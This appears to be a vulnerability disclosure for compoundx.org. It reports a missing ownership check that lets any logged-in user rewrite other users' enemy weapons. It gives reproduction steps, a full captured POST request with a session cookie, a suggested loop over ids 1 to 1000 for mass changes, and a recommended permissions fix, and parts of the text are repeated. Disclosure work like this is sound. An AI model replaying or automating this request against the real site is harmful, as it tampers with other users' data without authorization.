Impact:
Any user with a valid session cookie can rewrite the data fields of any enemy weapon in the database, regardless of ownership or privacy settings.
Fill in required fields, then capture the packet generated by clicking the "Submit to DB" button (shown below)
Change the enemy weapon id (§§ in the example packet) to an arbitrary number, or a particular one if you happen to have a particular enemy weapon in mind and know its id.
Make arbitrary changes to data fields, such as name, description, privacy, etc, then submit the packet.
Use automation software to submit packets cycling through monster ids from 1 to 1000 (or however high one prefers) to effect mass changes to all enemy weapons.
Using the below packet, I was able to rewrite any monster in the database by altering the §§ in the first line to reference any enemy weapon id. Then, in the data fields, information can be arbitrarily changed to effect whatever alteration an agent wishes to make, including alteration of privacy settings.
Recommended fix:
Adding in permissions that disallow (non-admin) users from updating enemy weapons that they did not make would prevent a bad actor with a single (non-admin) cookie from updating enemy weapons owned by other users.
Impact: Any user with a valid session cookie can rewrite the data fields of any enemy weapon in the database, regardless of ownership or privacy settings.
Steps to Reproduce:
Using the below packet, I was able to rewrite any monster in the database by altering the §§ in the first line to reference any enemy weapon id. Then, in the data fields, information can be arbitrarily changed to effect whatever alteration an agent wishes to make, including alteration of privacy settings.
POST /updateMonsterWeapon/§§ HTTP/1.1 Host: www.compoundx.org Connection: close Content-Length: 239 Cache-Control: max-age=0 Origin: https://www.compoundx.org Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 Sec-Fetch-User: ?1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Referer: https://www.compoundx.org/monsterweaponupdate/1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: session=.eJyrVorQdQ4OclOyqlZSSFKyUorKtTRJ8fAqS3G0tVWq1VFKySwuyEmszEvMTYWrCc51K4mK8AXLF-XnICRC3SsyUsPDKkESpcWpRSi6wjzCKlPcK3KS3C0ro8Cm1wIAWVwmqQ.ESuFpg.jwrHczi4OYXLM62Xtm9QGSaF_yE
name=Flying+Turtle&damage=0&refmod=0&ap_level=0&reload_dc=0&move_speed_penalty=0&cost=7000&mag=1&magCost=0&auto_fire_rate=60&type=Bow&range1=0&accuracy1=0&range2=0&accuracy2=0&range3=0&accuracy3=0&fire_select=None&description=Run.+In+fear.
Recommended fix: Adding in permissions that disallow (non-admin) users from updating enemy weapons that they did not make would prevent a bad actor with a single (non-admin) cookie from updating enemy weapons owned by other users.